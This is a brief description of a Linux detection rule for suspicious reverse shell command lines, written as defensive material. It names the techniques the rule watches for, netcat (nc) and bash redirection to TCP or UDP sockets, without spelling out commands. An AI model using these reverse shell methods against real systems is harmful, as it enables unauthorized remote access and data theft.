This rule targets the detection of suspicious reverse shell command lines that may be utilized by threat actors to establish a reverse shell connection with remote servers. The rule leverages various known patterns and command syntax associated with reverse shells, including commands that redirect input and output through TCP or UDP sockets. By identifying these commands within a Linux environment, it helps in early detection of unauthorized remote access attempts. The detection relies on monitoring the command line inputs for keywords indicative of reverse shell behavior, such as the use of netcat (nc), bash redirections to network sockets, or other command constructs that suggest an outgoing connection established to potentially exfiltrate data or provide remote control to an attacker. Organizations can implement this rule to enhance their security posture against prevalent attack strategies exploiting reverse shells. Continuous review of the identified commands and patterns enables the gradual refinement of detection mechanisms to minimize false positives while ensuring critical incidents are promptly reported.